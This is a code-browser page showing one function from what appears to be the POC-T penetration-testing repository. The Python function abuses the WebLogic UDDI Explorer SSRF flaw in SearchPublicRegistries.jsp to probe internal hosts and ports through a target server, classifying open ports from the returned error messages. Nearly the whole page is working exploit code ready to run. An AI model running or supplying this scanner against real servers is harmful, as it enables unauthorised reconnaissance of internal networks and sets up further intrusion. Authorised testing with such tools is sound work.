MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/weblogic-ssrf-netmap.py:26–52  ·  view source on GitHub ↗
(ip_str)

Source from the content-addressed store, hash-verified

24base_uri = 'https://xxx.xxx.com'
25
26def poc(ip_str):
27 ans = []
28 flag = False
29 for port in ports:
30 exp_url = base_uri.rstrip('/') + "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" % (
31 ip_str, port)
32 try:
33 # 根据情况设置timeout
34 c = requests.get(exp_url, timeout=3, verify=False).content
35 if 'weblogic.uddi.client.structures.exception.XML_SoapException' in c:
36 if 'No route to host' in c:
37 # 主机不存在
38 return False
39 elif 'Received a response' in c:
40 ans.append(port)
41 flag = True
42 elif 'Response contained no data' in c:
43 ans.append(port)
44 flag = True
45 elif 'but could not connect' in c:
46 # 主机存在但端口未开放
47 flag = True
48 except Exception:
49 pass
50 if flag:
51 return ip_str + ':' + str('/'.join(ans))
52 return False
53

Callers

nothing calls this directly

Calls 2

getMethod · 0.80
appendMethod · 0.45

Tested by

no test coverage detected